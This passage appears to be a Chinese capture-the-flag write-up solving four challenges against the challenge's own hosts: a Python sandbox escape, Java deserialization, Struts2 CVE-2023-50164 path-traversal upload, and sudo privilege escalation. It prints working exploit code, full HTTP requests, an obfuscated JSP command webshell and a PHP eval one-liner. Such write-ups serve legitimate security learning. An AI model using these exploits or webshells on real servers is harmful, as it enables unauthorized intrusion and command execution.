print(OS.ｐｏｐｅｎ(chr(108)+chr(115)+chr(32)+chr(47)).ｒｅａｄ())

注意这里的M[chr(111)+chr(115)] = OS复原os是必要的，因为os.popen在 Python 3 中本质上就是subprocess.Popen的一个封裝，而subprocess模块初始化时又需要用到os内的函数，不加就会遇到以下报错：

1
Traceback (most recent call last):
2
  File "/tmp/tmppu69wi2n.py", line 30, in <module>
3
    print(OS.ｐｏｐｅｎ(chr(108)+chr(115)+chr(32)+chr(47)).ｒｅａｄ())
4
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
5
  File "<frozen os>", line 1020, in popen
6
  File "/usr/local/lib/python3.12/subprocess.py", line 106, in <module>
7
    _waitpid = os.waitpid
8
               ^^^^^^^^^^
9
AttributeError: 'str' object has no attribute 'waitpid'

报错也解释了，真是因为os为字符串，而字符串显然没有waitpid属性。

所以原理上subprocess，也能实现popen的功能，但是因为是这道题里os模块不可用，想用subprocess还得先还原os，就有点多此一举了。

你也懂java？#

三周目开始上Java题了，真是怕什么来什么

这道题是非常基础的[[Java 反序列化]] (Java Deserialization)，

给出了网页源码：

1
public void handle(HttpExchange exchange) throws IOException {
2
    String method = exchange.getRequestMethod();
3
    String path = exchange.getRequestURI().getPath();
4

5
    if ("POST".equalsIgnoreCase(method) && "/upload".equals(path)) {
6
        try (ObjectInputStream ois = new ObjectInputStream(exchange.getRequestBody())) {
7
            Object obj = ois.readObject();
8
            if (obj instanceof Note) {
9
                Note note = (Note) obj;
10
                if (note.getFilePath() != null) {
11
                    echo(readFile(note.getFilePath()));
12
                }
13
            }
14
        } catch (Exception e) {}
15
    }
16
}

和危险对象类Note.class，直接在这里构造反序列化：

1
import java.io.ByteArrayOutputStream;
2
import java.io.ObjectOutputStream;
3
import java.io.Serializable;
4

5
import java.net.URI;
6
import java.net.http.HttpClient;
7
import java.net.http.HttpRequest;
8
import java.net.http.HttpResponse;
9

10
public class Note implements Serializable {
11
    private static final long serialVersionUID = 1L;
12

13
    private String title;
14
    private String message;
15
    private String filePath;
16

17
    public Note(String title, String message, String filePath) {
18
        this.title = title;
19
        this.message = message;
20
        this.filePath = filePath;
21
    }
22

23
    public String getTitle() {
24
        return title;
25
    }
26

27
    public String getMessage() {
28
        return message;
29
    }
30

31
    public String getFilePath() {
32
        return filePath;
33
    }
34

35
    public static void main(String[] args) throws Exception {
36
        Note payload = new Note("", "", "/flag");
37
        String URL = "http://challenge.shc.tf:31372/upload";
38

39
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
40
        ObjectOutputStream oos = new ObjectOutputStream(baos);
41
        oos.writeObject(payload);
42
        byte[] serializedData = baos.toByteArray();
43

44
        // 使用 HttpClient 发送 POST 请求
45
        HttpClient client = HttpClient.newHttpClient();
46
        HttpRequest request = HttpRequest.newBuilder()
47
                .uri(URI.create(URL))
48
                .header("Content-Type", "application/octet-stream")
49
                .POST(HttpRequest.BodyPublishers.ofByteArray(serializedData))
50
                .build();
51

52
        HttpResponse<String> response = client.send(request, HttpResponse.BodyHandlers.ofString());
53

54
        System.out.println(response.body());
55
    }
56
}

这里使用 Java 11 的 HttpClient 类来发包，可以少写不少代码，~~虽然还是很多~~

BabyJavaUpload#

像Java这么高级的编程语言，CVE里面应该不会存着什么乱起八糟的getshell漏洞吧？）

考点为 CVE-2023-50164(S2-066) 文件上传漏洞。

打开就是一个文件上传页，允许上传绝大部分的文件类型，但是不知道上传路径，我们随便上传一个文件，文件名最后加一个斜杠为非法文件路径，能得到报错：

1
java.lang.IllegalArgumentException: Parameter 'destFile' is not a file: /usr/local/tomcat/webapps/ROOT/WEB-INF/uplOadAS/up1oad
2
  org.apache.commons.io.FileUtils.requireFile(FileUtils.java:2737)
3
  org.apache.commons.io.FileUtils.requireFileIfExists(FileUtils.java:2766)
4
  org.apache.commons.io.FileUtils.copyFile(FileUtils.java:844)
5
  org.apache.commons.io.FileUtils.copyFile(FileUtils.java:756)
6
  blckder02.struts2.action.UploadAction.execute(UploadAction.java:30)
7
  sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
8
  sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
9
  sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
10
  java.lang.reflect.Method.invoke(Method.java:498)
11
  ognl.OgnlRuntime.invokeMethodInsideSandbox(OgnlRuntime.java:1245)
12
  ognl.OgnlRuntime.invokeMethod(OgnlRuntime.java:1230)
13
  ognl.OgnlRuntime.callAppropriateMethod(OgnlRuntime.java:1958)
14
  ognl.ObjectMethodAccessor.callMethod(ObjectMethodAccessor.java:68)
15
...

这里泄漏了后端使用了 Apache Struts2 框架，使用 commons-io 库来处理文件，并且暴露了Web 的绝对路径是 /usr/local/tomcat/webapps/ROOT/，所以这里我们可以利用利用 Struts2 的参数覆盖漏洞 (CVE-2023-50164)：

Struts2 有一个特性：它会自动将 HTTP 参数绑定到 Action 类的变量上。对于文件上传，通常会有三个变量：

upload (文件对象)
uploadContentType (文件类型)
uploadFileName (文件名)

漏洞原理：
CVE-2023-50164 利用了 Struts2 的参数解析逻辑缺陷，攻击者可以通过构造特殊的 HTTP 请求，让 Struts2 先设置正常的文件名，然后又被恶意参数覆盖。

我们先随便上传个文件，抓住数据包：

1
POST /upload.action HTTP/1.1
2
Host: challenge.shc.tf:31316
3
Content-Length: 200
4
Cache-Control: max-age=0
5
Origin: http://challenge.shc.tf:31316
6
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysGFDCPf3teSEInOj
7
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
8
Connection: keep-alive
9

10
------WebKitFormBoundarysGFDCPf3teSEInOj
11
Content-Disposition: form-data; name="myfile"; filename="a.txt"
12
Content-Type: application/octet-stream
13

14
123
15

16
------WebKitFormBoundarysGFDCPf3teSEInOj--

可以看到，这里上传的文件表单的name字段值为myfile，我们将其修改为首字母大写的Myfile，然后在url里添加GET参数?myfileFileName=../../../a.txt

1
POST /upload.action?myfileFileName=../../../a.txt HTTP/1.1
2
Host: challenge.shc.tf:31316
3
Content-Length: 200
4
Origin: http://challenge.shc.tf:31316
5
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysGFDCPf3teSEInOj
6
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
7
Connection: keep-alive
8

9
------WebKitFormBoundarysGFDCPf3teSEInOj
10
Content-Disposition: form-data; name="Myfile"; filename="a.txt"
11
Content-Type: application/octet-stream
12

13
123
14

15
------WebKitFormBoundarysGFDCPf3teSEInOj--

这样，服务器接受到的 name 属性改为 Myfile (首字母大写)，而不是代码里定义的 myfile。
由于大小写不匹配，Struts2 的文件上传拦截器（FileUpload Interceptor）虽然解析了文件内容，但没有正确地将文件名绑定到 Action 的 myfileFileName 属性上（或者绑定到了错误的临时变量）。
此时，Action 中的 myfileFileName 属性可能还是空的，或者被设为了默认值。
然后 Struts2 的参数拦截器（Parameters Interceptor）会在文件上传拦截器之后运行。当它扫描到这个 GET 参数 myfileFileName，发现 Action 类中正好有对应的 setMyfileFileName() 方法。
于是，它直接将 ../../../a.txt 赋值给了 myfileFileName 属性。

这样，路径穿越文件上传就发生了，此时我们直接访问/a.txt就能成功得到我们刚刚上传的 123 了，于是，我们就能直接上传木马，得到webshell。

1
POST /upload.action?myfileFileName=../../../a.jsp HTTP/1.1
2
Host: challenge.shc.tf:31316
3
Content-Length: 912
4
Origin: http://challenge.shc.tf:31316
5
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypNlUA73qbyn6x9gd
6
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
7
Connection: keep-alive
8

9
------WebKitFormBoundarypNlUA73qbyn6x9gd
10
Content-Disposition: form-data; name="Myfile"; filename="a.jsp"
11
Content-Type: application/octet-stream
12

13
<%@ page contentType="text/html;charset=UTF-8"  language="java" %>
14
<%
15
    if(request.getParameter("cmd")!=null){
16
        Class rt = Class.forName(new String(new byte[] { 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101 }));
17
        Process e = (Process) rt.getMethod(new String(new byte[] { 101, 120, 101, 99 }), String.class).invoke(rt.getMethod(new String(new byte[] { 103, 101, 116, 82, 117, 110, 116, 105, 109, 101 })).invoke(null), request.getParameter("cmd") );
18
        java.io.InputStream in = e.getInputStream();
19
        int a = -1;byte[] b = new byte[2048];out.print("<pre>");
20
        while((a=in.read(b))!=-1){ out.println(new String(b)); }out.print("</pre>");
21
    }
22
%>
23
------WebKitFormBoundarypNlUA73qbyn6x9gd--

sudoooo0#

有shell了交个flag先

打开就是403，扫盘起手，得到webshell.php (dirsearch默认字典扫不出来)，返回空白页，接下来就是爆破参数(密码)，得到cmd，后台的木马就是简单的php一句话：<?php @eval($_GET['cmd']);?>，在根目录发现：

1
total 8
2
drwxr-xr-x.   1 root root  51 Feb 22 10:28 .
3
drwxr-xr-x.   1 root root  51 Feb 22 10:28 ..
4
lrwxrwxrwx.   1 root root   7 Nov  7 17:40 bin -> usr/bin
5
drwxr-xr-x.   2 root root   6 Nov  7 17:40 boot
6
drwxr-xr-x    5 root root 360 Feb 22 10:28 dev
7
-rwxr-xr-x.   1 root root 785 Dec 14 04:47 docker-entrypoint.sh
8
drwxr-xr-x.   1 root root  50 Feb 22 10:28 etc
9
-r--------.   1 root root  39 Feb 22 10:28 flag
10
drwxr-xr-x.   1 root root  17 Dec 14 04:47 home
11
lrwxrwxrwx.   1 root root   7 Nov  7 17:40 lib -> usr/lib
12
lrwxrwxrwx.   1 root root   9 Nov  7 17:40 lib64 -> usr/lib64
13
drwxr-xr-x.   2 root root   6 Dec  8 00:00 media
14
drwxr-xr-x.   2 root root   6 Dec  8 00:00 mnt
15
drwxr-xr-x.   2 root root   6 Dec  8 00:00 opt
16
dr-xr-xr-x. 666 root root   0 Feb 22 10:28 proc
17
drwx------.   2 root root  37 Dec  8 00:00 root
18
drwxr-xr-x.   1 root root  48 Feb 22 10:28 run
19
lrwxrwxrwx.   1 root root   8 Nov  7 17:40 sbin -> usr/sbin
20
drwxr-xr-x.   2 root root   6 Dec  8 00:00 srv
21
dr-xr-xr-x.  13 root root   0 Jan 30 15:57 sys
22
drwxrwxrwt.   1 root root   6 Feb 22 10:28 tmp
23
drwxr-xr-x.   1 root root  83 Dec  8 00:00 usr
24
drwxr-xr-x.   1 root root  17 Dec  8 22:42 var

很明显根目录下flag要提权，先查查SUID文件:

1
> find / -perm -u=s -type f 2>/dev/null
2

3
/usr/bin/chfn
4
/usr/bin/chsh
5
/usr/bin/gpasswd
6
/usr/bin/mount
7
/usr/bin/newgrp
8
/usr/bin/passwd
9
/usr/bin/su
10
/usr/bin/umount
11
/usr/bin/sudo

没有明显能利用提权的文件，再查查进程：

1
> ps -ef
2

3
UID          PID    PPID  C STIME TTY          TIME CMD
4
root           1       0  0 10:28 ?        00:00:00 apache2 -DFOREGROUND
5
ctf           25       1  0 10:28 ?        00:00:00 script -q -f -c bash -li -c "echo 0dy9e6 | sudo -S -v >/dev/null 2>&1; sleep infinity" /dev/null
6
ctf           26      25  0 10:28 pts/0    00:00:00 sleep infinity
7
ctf           55       1  0 10:29 ?        00:00:00 apache2 -DFOREGROUND
8
ctf           63       1  0 10:29 ?        00:00:00 apache2 -DFOREGROUND
9
ctf           82       1  0 10:32 ?        00:00:00 apache2 -DFOREGROUND
10
ctf           87       1  0 10:33 ?        00:00:00 apache2 -DFOREGROUND
11
ctf           88       1  0 10:33 ?        00:00:00 apache2 -DFOREGROUND
12
ctf           89       1  0 10:33 ?        00:00:00 apache2 -DFOREGROUND
13
ctf           90       1  0 10:33 ?        00:00:00 apache2 -DFOREGROUND
14
ctf           93       1  0 10:33 ?        00:00:00 apache2 -DFOREGROUND
15
ctf           98       1  0 10:36 ?        00:00:00 apache2 -DFOREGROUND
16
ctf           99       1  0 10:37 ?        00:00:00 apache2 -DFOREGROUND
17
ctf          127      88  0 10:46 ?        00:00:00 sh -c -- ps -ef
18
ctf          128     127  0 10:46 ?        00:00:00 ps -ef

很明显，这里PID 25 的进程：

script -q -f -c bash -li -c "echo 0dy9e6 | sudo -S -v >/dev/null 2>&1; sleep infinity" /dev/null

echo 0dy9e6 | sudo -S -v直接写明了sudo密码为0dy9e6，配合-S参数允许sudo从管道接受密码，我们就能直接得到root权限了。但是注意，因为sudo会新开shell，system函数那不到这个结果，所以我们仿照这段命令，使用script命令得到完整的输出：script -q -c "echo 0dy9e6 | sudo -S cat /flag"。